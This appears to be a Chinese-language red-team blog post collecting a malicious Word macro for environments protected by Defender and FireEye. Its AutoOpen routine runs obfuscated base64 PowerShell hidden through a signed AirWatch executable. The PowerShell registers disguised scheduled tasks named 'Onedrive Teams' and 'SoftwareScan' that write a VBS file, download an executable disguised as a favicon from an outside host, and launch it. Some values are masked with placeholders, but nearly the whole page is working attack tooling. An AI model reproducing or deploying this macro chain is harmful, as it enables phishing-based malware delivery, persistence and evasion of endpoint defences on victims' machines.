MDE Defender+Fireeye ETP+MDO 环境下word宏collect 2023-05-09 07:23:19 Steven Xeldax ![](/download/5dff0c81-8117-4d05-aacd-314eab376808.png) ## marco ``` Sub teest() ' ' teest Macro ' ' End Sub Sub AutoOpen() Dim sec As String sec = """C:\Program Files (x86)\Airwatch\AgentUI\AW.ProtectionAgent.PowershellExecutor64.exe"" ExecutePowershell " sec = sec & "X" sec = sec & "X" sec = sec & "X" sec = sec & "sYm5RdVVHOTNaWEp6YUdWc2JFVjRaV04xZEc5eU5qUXVaWGhsSWlJZ1JYaGxZM1YwWlZCdmQyVnljMmhsYkd3Z1NVTlNNV050ZDJkUVUwRnBZVW" sec = sec & "hTTUdOSVRUWk1lVGx5V1ZkNGNFOUROWFpaYmsxMVdWaEJkR015T1RGa1IyaHNXVmhPTUV4VVJYVmlXR3h2WkZkR00xcFhiR3BpUnpreFdrTTFhbU" sec = sec & "l5TUhaYWJVWXlUVmRPZG1KcE5YQlpNamhwUTJkdmExcEhWbnBrUTBFNVNVTkphMXBYTlRKUGJsSnNZbGhDWTFoSVRqSlpNbEpvVEcxV05GcFRTVX" sec = sec & "REYld4dFNVTm5kR0p0T1RCSlEyaFZXbGhPTUV4V1FtaGtSMmRuU2tkU2JHTXpVWEJMVTBJM1EydHNkV1J0T1hKYVV6RllXbGRLVTFwWVJqRmFXRT" sec = sec & "R3U1VNeFZtTnRhMmRLU0ZaNVlrTkJkRlF6VmpCU2JXeHpXbE5CYTFwSFZucGtRWEE1U1VkV2MyTXlWamREYkdSNVlWaFNiRXhWYUhaak0xRm5TV3R" sec = sec & "hY0dKSFZXZFpWM2g1V2xkR2EyVlRRbXhsUjJ4NlpFUkZlRTFVUm5wTWFVbExabEZ2UzBwSVFubGlNazVzWXpOT1QxbFhNV3hKUkRCblNXNU9NbGt" sec = sec & "X" sec = sec & "X" sec = sec & "X" sec = sec & "WSFJqQmhRWEE1SURFd01DSUtiMkpxVTJobGJHd3VVblZ1SUd4aGRXNWphQ3dnTUN3Z1ZISjFaUT09Jyc7ICRkZWNvZGVkU2NyaXB0ID0gW1N5c3Rlb" sec = sec & "X" sec = sec & "bmNvZGluZyAnJ0FTQ0lJJycgLUlucHV0T2JqZWN0ICRkZWNvZGVkU2NyaXB0IC1GaWxlUGF0aCAkcSInCiRhY3Rpb24gPSBOZXctU2NoZWR1bGVkVGFz" sec = sec & "a0FjdGlvbiAtRXhlY3V0ZSAicG93ZXJzaGVsbC5leGUiICAtQXJndW1lbnQgJGEKJHRyaWdnZXI9TmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmN" sec = sec & "lIC1BdCAoZ2V0LWRhdGUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAxKQpSZWdpc3Rlci1TY2hlZHVsZWRUYXNrI" sec = sec & "C1UYXNrTmFtZSAiT25lZHJpdmUgVGVhbXMiIC1UcmlnZ2VyICR0cmlnZ2VyIC1Vc2VyICRlbnY6dXNlcm5hbWUgLUFjdGlvbiAkYWN0aW9uCgokYWN" sec = sec & "0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgIndzY3JpcHQuZXhlIiAgLUFyZ3VtZW50ICIkZW52OnRlbXBcXHN2Y2RhLnZi" sec = sec & "cyIKJHRyaWdnZXI9TmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoZ2V0LWRhdGUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1Ua" sec = sec & "W1lU3BhbiAtTWludXRlcyAyKQpSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiU29mdHdhcmVTY2FuIiAtVHJpZ2dlciAkdHJpZ2dlci" sec = sec & "AtVXNlciAkZW52OnVzZXJuYW1lIC1BY3Rpb24gJGFjdGlvbiAK" sec = sec & " 100" Shell sec, vbHide End Sub ``` ## first step创建定时任务 ``` $a=' -WindowStyle hidden -Command "$q=$env:temp+''\\svcda.vbs'';$fc = ''XXXXX==''; $decodedScript = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fc)); Out-File -Encoding ''ASCII'' -InputObject $decodedScript -FilePath $q"' $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $a $trigger=New-ScheduledTaskTrigger -Once -At (get-date) -RepetitionInterval (New-TimeSpan -Minutes 1) Register-ScheduledTask -TaskName "Onedrive Teams" -Trigger $trigger -User $env:username -Action $action $action = New-ScheduledTaskAction -Execute "wscript.exe" -Argument "$env:temp\\svcda.vbs" $trigger=New-ScheduledTaskTrigger -Once -At (get-date) -RepetitionInterval (New-TimeSpan -Minutes 2) Register-ScheduledTask -TaskName "SoftwareScan" -Trigger $trigger -User $env:username -Action $action ``` ## 定时任务内容1 ``` $url = "https://X.com/fav1con.ico" $dest = "$env:temp\\svcda.exe" if (-not (Test-Path $dest)) { Invoke-WebRequest -Uri $url -OutFile $dest } else{ Write-Host "File already exist1111s." } $processName = "svcda" $programPath = "$env:temp\\svcda.exe" if (-not (Get-Process $processName -ErrorAction SilentlyContinue)) { Start-Process -FilePath $programPath } ``` ## 定时任务2 ``` $fc = "XXXXXX==" [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fc)) | Out-File -Encoding "ASCII" "$env:temp\\svcda.vbs" ``